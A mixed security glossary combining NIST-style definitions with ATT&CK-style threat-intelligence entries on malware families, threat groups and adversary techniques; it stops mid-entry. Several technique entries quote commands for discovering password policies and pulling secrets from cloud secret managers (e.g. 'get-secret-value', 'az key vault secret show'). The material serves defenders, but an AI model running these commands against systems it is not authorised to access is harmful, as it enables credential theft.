Definition: A high-level statement of organizational key-management policies that identifies a high-level structure, responsibilities, governing standards, organizational dependencies and other relationships, and security policies.

Term: Card Verifiable Certificate
Definition: A certificate stored on the card that includes a public key, the signature of certification authority, and the information needed to verify the certificate.

Term: Master key
Definition: A key used with a key-derivation function or method to derive additional keys. Sometimes called a master key.

Term: event
Definition: Any observable occurrence in an information system.

Term: HMAC-PRF
Definition: The HMAC function being used as a PRF.

Name: RTM
Type: malware
Description: RTM is custom malware written in Delphi. It is used by the group of the same name (RTM). Newer versions of the malware have been reported publicly as Redaman.

Term: Application Protocol Data Unit
Definition: A part of the application layer in the Open Systems Interconnection Reference model that is used for communication between two separate device's applications. In the context of smart cards, an APDU is the communication unit between a smart card reader and a smart card. The structure of the APDU is defined by [ISO 7816-4].

Term: Agency Dashboard
Definition: See Agency Dashboard and Federal Dashboard.

Term: Predictability
Definition: Enabling reliable assumptions by individuals, owners, and operators about data and their processing by a system, product, or service.

Term: probability of occurrence
Definition: See likelihood of occurrence.

Term: baseline
Definition: The set of controls that are applicable to information or an information system to meet legal, regulatory, or policy requirements, as well as address protection needs for the purpose of managing risk.

Term: identity
Definition: Unique group element&nbsp;<span class="math-tex">\(0\)</span><em>&nbsp;</em>for which&nbsp;<span class="math-tex">\(x+0=x\)</span>&nbsp;for each group element&nbsp;<span class="math-tex">\(x\)</span>, relative to the binary group operator&nbsp;<span class="math-tex">\(+\)</span>.

Term: Pseudorandom function (PRF)
Definition: A function that can be used to generate output from a secret random seed and a data variable, such that the output is computationally indistinguishable from truly random output. In this Recommendation, an approved message authentication code (MAC) is used as a pseudorandom function in the key expansion step, where a key derivation key is used as the secret random seed.

Term: SDL
Definition: The set of methods to reduce the risk of disclosing information on individuals, businesses or other organizations. Such methods are only related to the dissemination step and are usually based on restricting the amount of or modifying the data released.

Name: Leviathan Australian Intrusions
Type: campaign
Description: Leviathan Australian Intrusions consisted of at least two long-term intrusions against victims in Australia by Leviathan, relying on similar tradecraft such as external service exploitation followed by extensive credential capture and re-use to enable privilege escalation and lateral movement. Leviathan Australian Intrusions were focused on exfiltrating sensitive data including valid credentials for the victim organizations.

Name: FIVEHANDS
Type: malware
Description: FIVEHANDS is a customized version of DEATHRANSOM ransomware written in C++. FIVEHANDS has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with SombRAT.

Term: Capability, Hardware Asset Management
Definition: See Capability, Hardware Asset Management.

Name: Sandworm Team
Type: intrusion-set
Description: Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455. This group has been active since at least 2009.

In October 2020, the US indicted six GRU Unit 74455 officers associated with Sandworm Team for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide NotPetya attack, targeting of the 2017 French presidential campaign, the 2018 Olympic Destroyer attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019. Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as APT28.

Term: federation
Definition: A process that allows for the conveyance of identity and authentication information across a set of networked systems.

Term: Competency
Definition: An individual’s ability to complete a task or tasks within the context of a work role.

Term: Security Association (SA)
Definition: The logical set of security parameters containing elements required for authentication, key establishment, and data encryption.

Term: restricted authenticator
Definition: An authenticator type, class, or instantiation that has additional risk of false acceptance associated with its use and is therefore subject to additional requirements.

Term: Capability, Anomalous Event Response and Recovery Management
Definition: An ISCM capability that ensures that both routine and unexpected events that require a response to maintain functionality and security are responded to (once identified) within a time frame that prevents or reduces the impact (i.e., consequences) of the events to the extent possible.

Term: Channel
Definition: An information transfer path within a system. May also refer to the mechanism by which the path is effected.

Term: fine-tuning circumvention
Definition: Fine-tuning to remove model refusal behaviour or other model-level safety interventions.

Term: Perceived Target Value
Definition: measures the likelihood of attack using the misuse vulnerability in an environment relative to vulnerable systems in other environments.

Name: Javali
Type: malware
Description: Javali is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.

Term: Semi-Quantitative Assessment
Definition: Use of a set of methods, principles, or rules for assessing risk based on bins, scales, or representative numbers whose values and meanings are not maintained in other contexts.

Name: Device Registration
Type: attack-pattern
Description: Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.

MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network. In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. 

Similarly, an adversary with existing access to a network may register a device or a virtual machine to Entra ID and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.

Devices registered in Entra ID may be able to conduct Internal Spearphishing campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client. Additionally, an adversary may be able to perform a Service Exhaustion Flood on an Entra ID tenant by registering a large number of devices.

Term: operational margin
Definition: The margin that is designed explicitly to provide space between the worst normal operating condition and the point at which failure occurs (derives from physical design margin).

Name: LightNeuron
Type: malware
Description: LightNeuron is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. LightNeuron has been used by Turla to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of LightNeuron exists.

Name: Grandoreiro
Type: malware
Description: Grandoreiro is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. Grandoreiro has confirmed victims in Brazil, Mexico, Portugal, and Spain.

Term: Identity Management System (IDMS)
Definition: One or more systems or applications that manage the identity verification, validation, and issuance process.

Term: Identity Assurance Level (IAL)
Definition: A category that conveys the degree of confidence that the applicant's claimed identity is their real identity. Note: NIST SP 800-63-3 describes three levels of assurance.

Term: control parameter
Definition: See organization-defined parameter.

Name: APT29
Type: intrusion-set
Description: APT29 is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR). They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015.

In April 2021, the US and UK governments attributed the SolarWinds Compromise to the SVR; public statements included citations to APT29, Cozy Bear, and The Dukes. Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.

Term: DMZ
Definition: A network created by connecting two firewalls. Systems that are externally accessible but need some protections are usually located on DMZ networks.

Term: spyware
Definition: Software that is secretly or surreptitiously installed into a system to gather information on individuals or organizations without their knowledge; a type of malicious code.

Term: Compressed File
Definition: A file reduced in size through the application of a compression algorithm, commonly performed to save disk space. The act of compressing a file makes it unreadable to most programs until the file is uncompressed.

Term: Transaction
Definition: A recording of an event, such as the transfer of tokens between parties, or the creation of new assets.

Term: Security Status
Definition: The security status of an enterprise’s networks, information, and systems based on information assurance resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes.

Term: senior agency information security officer (SAISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.

Term: Test
Definition: A type of assessment method that is characterized by the process of exercising one or more assessment objects under specified conditions to compare actual with expected behavior, the results of which are used to support the determination of security control effectiveness over time.

Term: privacy control assessment
Definition: The assessment of privacy controls to determine whether the controls are implemented correctly, operating as intended, and sufficient to ensure compliance with applicable privacy requirements and manage privacy risks. Note: A privacy control assessment is both an assessment and a formal document detailing the process and the outcome of the assessment.

Term: threat analysis
Definition: Assessment to evaluate the actual or potential effect of a threat to a system. 
Note: The threat assessment may include identifying and describing the nature of the threat.

Term: XOF
Definition: <p>A function on bit strings in which the output can be extended to any desired length. Approved XOFs (e.g., those specified in FIPS 202) are designed to satisfy the following properties as long as the specified output length is sufficiently long to prevent trivial attacks</p><p>1. (One-way) It is computationally infeasible to find any input that maps to any new pre-specified output.</p><p>2. (Collision-resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.</p>

Term: Digital Certificate
Definition: Certificate (as defined above).

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides origin authentication, assurance of data integrity, and signatory non-repudiation.

Name: Web Shell
Type: attack-pattern
Description: Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.

In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. China Chopper Web shell client).

Name: CCBkdr
Type: malware
Description: CCBkdr is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website.

Name: DnsSystem
Type: malware
Description: DnsSystem is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by HEXANE since at least June 2022.

Term: HTTP
Definition: A standard method for communication between clients and Web servers.

Term: Associated Data
Definition: Input data that is authenticated but not encrypted.

Name: Obfuscated Files or Information
Type: attack-pattern
Description: Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. Adversaries may also use compressed or archived scripts, such as JavaScript. 

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.

Adversaries may also abuse Command Obfuscation to obscure commands executed from payloads or directly via Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms.

Term: anti-signal spoof
Definition: Result of measures used to resist attempts to achieve imitative or manipulative communications deception based on signal parameters.

Term: Master key
Definition: A key used as an input to a key-derivation method to derive other keys. See SP 800-108.

Term: Cryptographic officer
Definition: An FCKMS role that is responsible for and authorized to initialize and manage all cryptographic services, functions, and keys of the FCKMS.

Term: Privacy Requirements
Definition: Requirements levied on an organization, information program, or information system that are derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, procedures, or organizational mission/business case needs to ensure that privacy protections are implemented in the collection, use, sharing, storage, transmittal, and disposal of information.

Term: Protection Bits
Definition: A mechanism commonly included in UNIX and UNIX-like systems that controls access based on bits specifying read, write, or execute permissions for a file’s (or directory’s) owner, group, or other(world).

Term: Data-encryption key
Definition: A key used to encrypt and decrypt information other than keys.

Term: resource
Definition: A device, data element, or file for which access is requested. Also known as protected resource and as an object.

Term: Decentralized network
Definition: A network configuration where there are multiple authorities that serve as a centralized hub for a subsection of participants. Since some participants are behind a centralized hub, the loss of that hub will prevent those participants from communicating.

Name: BRONZE BUTLER
Type: intrusion-set
Description: BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.

Term: AD
Definition: Input data to the CCM generation-encryption process that is authenticated but not encrypted.

Term: <em>x -1 mod n</em>
Definition: The multiplicative inverse of the integer x modulo the positive integer n. This quantity is defined if and only if x is relatively prime to n. For the purposes of this Recommendation, y = x-1 mod n is the unique integer satisfying the following two conditions:

Term: Staking
Definition: Protocol-defined token collateralization earning yields and/or providing privileges, either at the base layer (in proof-of-stake consensus models) or at the smart contract layer.

Name: LazyWiper
Type: malware
Description: LazyWiper is a destructive malware observed targeting a manufacturing sector company during the 2025 Poland Wiper Attacks. LazyWiper is a native Windows PowerShell script that is believed to have been generated by a large language model (LLM). LazyWiper overwrites files on the system using the C# function `WriteRandomBytes()` and can target multiple specific file types by their extensions.

Term: Scheme
Definition: A (cryptographic) scheme consists of a set of unambiguously specified transformations that are capable of providing a (cryptographic) service when properly implemented and maintained. A scheme is a higher-level construct than a primitive, and a lower-level construct than a protocol.

Term: Assumption
Definition: Used to indicate the conditions that are required to be true when an approved key-establishment scheme is executed in accordance with this Recommendation.

Term: Interoperability
Definition: The ability of one entity to communicate with another entity.

Term: <em>Noise source</em>
Definition: The component of an entropy source that contains the non-deterministic, entropy-producing activity (e.g., thermal noise or hard drive seek times).

Term: firmware
Definition: Computer programs and associated data that may be dynamically written or modified during execution.

Term: concept of operations
Definition: Verbal and graphic statement of an organization’s assumptions or intent in regard to an operation or series of operations of a specific system or a related set of specific new, existing, or modified systems.

Term: user‐level privacy
Definition: A unit of privacy that defines neighboring databases as those that differ in one user’s data.

Name: POWERTON
Type: malware
Description: POWERTON is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by APT33. At least two variants of the backdoor have been identified, with the later version containing improved functionality.

Term: Forensically Clean
Definition: Digital media that is completely wiped of all data, including nonessential and residual data, scanned for malware, and verified before use.

Term: Statistical Test (of a Hypothesis)
Definition: A function of the data (binary stream) which is computed and used to decide whether or not to reject the null hypothesis. A systematic statistical rule whose purpose is to generate a conclusion regarding whether the experimenter should accept or reject the null hypothesis Ho.

Term: Packet Filter
Definition: A routing device that provides access control functionality for host addresses and communication sessions.

Term: non-repudiation
Definition: A service that is used to provide assurance of the integrity and origin of data in such a way that the integrity and origin can be verified by a third party as having originated from a specific entity in possession of the private key of the claimed signatory.

Term: Allan deviation
Definition: [See source document for the complete definition.]

Term: High-Value Asset
Definition: A designation of federal information or a federal information system when it relates to one or more of the following categories: -&nbsp; Informational Value – The information or information system that processes, stores, or transmits the information is of high value to the Government or its adversaries. -&nbsp; Mission Essential – The agency that owns the information or information system cannot accomplish its Primary Mission Essential Functions (PMEF), as approved in accordance with Presidential Policy Directive 40 (PPD-40) National Continuity Policy, within expected timelines without the information or information system. -&nbsp; Federal Civilian Enterprise Essential (FCEE) – The information or information system serves a critical function in maintaining the security and resilience of the federal civilian enterprise.

Term: Host Key
Definition: A public key used for authenticating a host in the SSH protocol to hosts that want to communicate with it (each host also generally has its own private host key). Some hosts may have more than one host key (e.g., one for each algorithm). Host keys are used for authenticating hosts (machines) themselves, not users or accounts, whereas identity keys and authorized keys relate to authenticating users/accounts and authorizing access to accounts on hosts.

Term: String
Definition: See Bitstring.

Term: SIA
Definition: The analysis conducted by an agency official, often during the continuous monitoring phase of the security certification and accreditation process, to determine the extent to which changes to the information system have affected the security posture of the system.

Term: min-entropy
Definition: A lower bound on the entropy of a random variable. The precise formulation for min-entropy is&nbsp;<span class="math-tex">\((-\log_{2} \max p_{i})\)</span>&nbsp;for a discrete distribution having probabilities&nbsp;<span class="math-tex">\(p_{1},...,p_{k}\)</span>. Min-entropy is often used as a measure of the unpredictability of a random variable.

Term: secure association key (SAK)
Definition: The secret key used by a MACsec Secure Association (SA).

Term: Individual
Definition: A citizen of the United States or an alien lawfully admitted for permanent residence. Agencies may, consistent with individual practice, choose to extend the protections of the Privacy Act and E-Government Act to businesses, sole proprietors, aliens, etc.

Term: Lightweight Directory Access Protocol (LDAP)
Definition: The Lightweight Directory Access Protocol, or LDAP, is a directory access protocol. In this document, LDAP refers to the protocol defined by RFC 1777, which is also known as LDAP V2. LDAP V2 describes unauthenticated retrieval mechanisms.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when
properly implemented, provides the services of:
1. origin authentication
2. data integrity, and
3. signer non-repudiation.

Term: mean time to detect
Definition: A metric that tracks the average amount of time that a problem exists before it is found.

Term: Key-wrapping key
Definition: A symmetric key that is used with a key-wrapping algorithm to protect the confidentiality and integrity of keys.

Term: Threat Assessment/Analysis
Definition: Assessment to evaluate the actual or potential effect of a threat to a system.
Note: The threat assessment may include identifying and describing the nature of the threat.

Term: Cybersecurity Incident
Definition: An occurrence that actually or potentially jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system; or constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Name: KeyBoy
Type: malware
Description: KeyBoy is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.

Term: denial of service (DoS)
Definition: The prevention of authorized access to a system resource or the delaying of system operations and functions.

Term: Portal VPN
Definition: A single standard SSL connection to a Web site (the portal) that allows a remote user to securely access multiple network services via a standard Web browser.

Term: self-protection
Definition: The protection provided by an entity to ensure its own correct behavior and function despite adversity.

Term: Rekey
Definition: A procedure in which a new cryptographic key is generated in a manner that is independent of the (old) cryptographic key that it will replace.

Term: assessor
Definition: See Security Control Assessor.

Term: Inventory management
Definition: As used in this Recommendation, the management of keys and/or certificates to monitor their status (e.g., expiration dates and whether compromised); assign and track their owners or sponsors (who/what they are and where they are located or how to contact them); and report the status to the appropriate official for remedial action, when required.

Term: baseline
Definition: Formally approved version of a configuration item, regardless of media, formally designated and fixed at a specific time during the configuration item's life cycle. 
Note: The engineering process generates many artifacts that are maintained as a baseline over the course of the engineering effort and after its completion. The configuration control processes of the engineering effort manage baselined artifacts. Examples include stakeholder requirements baseline, system requirements baseline, architecture/design baseline, and configuration baseline.

Term: metadata
Definition: Data about data. For filesystems, metadata is data that provides information about a file’s contents.

Term: Relationship Type
Definition: The type of supportive relationship being specified between a Reference Document Element and a Focal Document Element within a supportive relationship mapping. This will be one of the following: supports, is supported by, identical, equivalent, contrary, or no relationship.

Name: DynoWiper
Type: malware
Description: DynoWiper is a destructive malware associated with the 2025 Poland Wiper Attacks in December of 2025. DynoWiper is a native Windows binary that is distributed by a PowerShell script and overwrites files using data generated by the Mersenne Twister algorithm before they are deleted from the system. Multiple variants of DynoWiper have been identified, with the primary differences being that one variant shuts down the system after completing its destructive operations, and another introduces a time delay between file overwriting and deletion.

Term: risk analysis
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation resulting from the operation of a system.

Name: Code Signing Certificates
Type: attack-pattern
Description: Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.

Prior to Code Signing, adversaries may develop self-signed code signing certificates for use in operations.

Name: reGeorg
Type: malware
Description: reGeorg is an open-source web shell written in Python that can be used as a proxy to bypass firewall rules and tunnel data in and out of targeted networks.

Name: Additional Container Cluster Roles
Type: attack-pattern
Description: An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account. Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.
 
This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. 

Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments. In these cases, this technique may be used in conjunction with Additional Cloud Roles.

Term: Course of Action
Definition: A time-phased or situation-dependent combination of risk response measures.

Term: attribute
Definition: Characteristic or property of an entity that can be used to describe its state, appearance, or other aspect.

Term: Semantics
Definition: The intended meaning of acceptable sentences of a language.

Term: Synthetic Identifier
Definition: An identifier that is assigned to an asset in the context of some management domain.

Term: Message
Definition: The data that is signed. Also known as “signed data” during the signature verification and validation process.

Name: gsecdump
Type: tool
Description: gsecdump is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems.

Term: <strong>Should</strong>
Definition: Used to indicate a strong recommendation, but not a requirement of this Recommendation.

Term: zeroization
Definition: An action applied to a key or a piece of (secret) data. In this Recommendation, after a key or a piece of data is destroyed, no information about its value can be recovered.

Term: Update
Definition: New, improved, or fixed software, which replaces older versions of the same software. For example, updating an operating system brings it up-to-date with the latest drivers, system utilities, and security software. The software publisher often provides updates free of charge.

Name: Exaramel for Linux
Type: malware
Description: Exaramel for Linux is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under Exaramel for Windows.

Term: system life cycle
Definition: The period of time that begins when a system is conceived and ends when the system is no longer available for use. 
Refer to life cycle stages.

Term: String
Definition: An ordered sequence of 0’s and 1’s. The leftmost bit is the most significant bit.

Term: Data Transfer Device
Definition: Fill device designed to securely store, transport, and transfer electronically both COMSEC and TRANSEC key, designed to be backward compatible with the previous generation of COMSEC common fill devices, and programmable to support modern mission systems.

Term: Functional Exercise
Definition: An exercise that allows personnel with operational responsibilities to validate their IT plans and their operational readiness for emergencies in a simulated operational environment.

Term: Key-derivation key
Definition: A key used as an input to a key-derivation function to derive additional keying material.

Name: NanHaiShu
Type: malware
Description: NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.

Term: identity
Definition: A set of attributes that uniquely describe a person within a given context.

Term: Owner
Definition: For an asymmetric key pair, consisting of a private key and a public key, the owner is the entity that is authorized to use the private key associated with a public key, whether that entity generated the key pair itself or a trusted party generated the key pair for the entity.

Term: ECDSA
Definition: A digital signature algorithm that is an analog of DSA using elliptic curves.

Name: Password Policy Discovery
Type: attack-pattern
Description: Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).

Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code> . Adversaries may also leverage a Network Device CLI on network devices to discover password policy information (e.g. <code>show aaa</code>, <code>show aaa common-criteria policy all</code>).

Password policies can be discovered in cloud environments using available APIs such as <code>GetAccountPasswordPolicy</code> in AWS .

Name: Compromise Software Supply Chain
Type: attack-pattern
Description: Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

Term: non-discretionary access control
Definition: A means of restricting access to system resources based on the sensitivity (as represented by a label) of the information contained in the system resource and the formal authorization (i.e., clearance) of users to access information of such sensitivity.

Term: insider threat program
Definition: A coordinated collection of capabilities authorized by the Department/Agency (D/A) that is organized to deter, detect, and mitigate the unauthorized disclosure of sensitive information.

Term: multi-factor authentication
Definition: Something the claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the claimant’s identity.

Term: steward
Definition: A privileged person entity responsible for curating ICAM data.

Name: Cloud Secrets Management Stores
Type: attack-pattern
Description: Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault. 

Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables. 

If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged Cloud Accounts or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.

**Note:** this technique is distinct from Cloud Instance Metadata API in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.

Term: <em>SK_PRF</em>
Definition: An n-byte key used to pseudorandomly generate the randomizer r.

Term: XML Encryption
Definition: A process/mechanism for encrypting and decrypting XML documents or parts of documents. World Wide Web Consortium (W3C) XML Encryption Syntax and Processing, http://www.w3.org/TR/xmlenc-core

Name: HexEval Loader
Type: malware
Description: HexEval Loader is a hex-encoded loader that collects host data, decodes follow-on scripts and acts as a downloader for the BeaverTail malware. HexEval Loader was first reported in April 2025. HexEval Loader has previously been leveraged by North Korea-affiliated threat actors identified as Contagious Interview. HexEval Loader has been delivered to victims through code repository sites utilizing typosquatting naming conventions of various npm packages.

Term: String
Definition: A sequence of bits.

Term: MP
Definition: A policy about policies, or policy for managing policies, such as assignment of priorities and resolution of conflicts between digital policies or other metapolicies.

Term: reauthentication
Definition: The process of confirming the subscriber’s continued presence and intent to be authenticated during an extended usage session.

Term: Byte
Definition: A sequence of 8 bits.

Term: Target Value
Definition: A single value that is the target of a matching process. A matching engine compares a source value to a target value to determine whether or not there is a source-to-target match. Source values include AV pairs or set relation values (e.g., superset or subset).

Term: Owner
Definition: For a static public key, static private key and/ or the static key pair containing those components, the owner is the entity that is authorized to use the static private key corresponding to the static public key, whether that entity generated the static key pair itself or a trusted party generated the key pair for the entity. For an ephemeral key pair, ephemeral private key or ephemeral public key, the owner is the entity that generated the ephemeral key pair and uses the ephemeral private key associated with the public key of that key pair.

Term: data integrity
Definition: See Data integrity.

Term: Government Off-The-Shelf
Definition: A software and/or hardware product that is developed by the technical staff of a Government organization for use by the U.S. Government. GOTS software and hardware may be developed by an external entity, with specification from the Government organization to meet a specific Government purpose, and can normally be shared among Federal agencies without additional cost. GOTS products and systems are not commercially available to the general public. Sales and distribution of GOTS products and systems are controlled by the Government.

Term: Key-derivation key
Definition: A key used as an input to a key-derivation method to derive other keys; see SP 800-108.

Term: False Positive
Definition: An erroneous acceptance of the hypothesis that a statistically significant event has been observed.

Term: Personal Information
Definition: See Personally Identifiable Information.

Term: Key format
Definition: The data structure of a cryptographic key.

Term: Training
Definition: Teaching people the knowledge and relevant and needed cybersecurity skills and competencies that will enable them to understand how to use and configure the IoT devices to enable them to most securely use the IoT devices.

Term: Key expansion
Definition: The second step in the key derivation procedure specified in this Recommendation to derive keying material with the desired length.

Term: noise injection
Definition: A de-identification technique that modifies a dataset by adding random values to the values of a selected attribute.

Term: Presidential Directive
Definition: A form of an executive order issued by the President of the United States with the advice and consent of the National Security Council; also known as a Presidential Decision Directive (or PDD).

Term: synthetic data generation
Definition: a process in which seed data is used to create artificial data that has some of the statistical characteristics as the seed data

Term: Object, Assessment
Definition: A passive entity that contains or receives information.

Term: Owner
Definition: A key pair owner is the entity that is authorized to use the private key of a key pair.

Term: Privacy Risk Management
Definition: A cross-organizational set of processes for identifying, assessing, and responding to privacy risks.

Term: Security Control Effectiveness
Definition: The measure of correctness of implementation (i.e., how consistently the control implementation complies with the security plan) and how well the security plan meets organizational needs in accordance with current risk tolerance.

Term: human bias
Definition: A form of bias that results from failures in the heuristics humans use to make decisions.

Term: ODP
Definition: The variable part of a control or control enhancement that is instantiated by an organization during the tailoring process by either assigning an organization-defined value or selecting a value from a predefined list provided as part of the control or control enhancement.

Name: Endpoint Denial of Service
Type: attack-pattern
Description: Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion.

An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.

In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.

For attacks attempting to saturate the providing network, see Network Denial of Service.

Name: WastedLocker
Type: malware
Description: WastedLocker is a ransomware family attributed to Indrik Spider that has been used since at least May 2020. WastedLocker has been used against a broad variety of sectors, including manufacturing, information technology, and media.

Term: XSS
Definition: Cross-Site Scripting is a security flaw found in some Web applications that enables unauthorized parties to cause client-side scripts to be executed by other users of the Web application.

Name: Match Legitimate Resource Name or Location
Type: attack-pattern
Description: Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation. 

This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.

Term: Business Areas
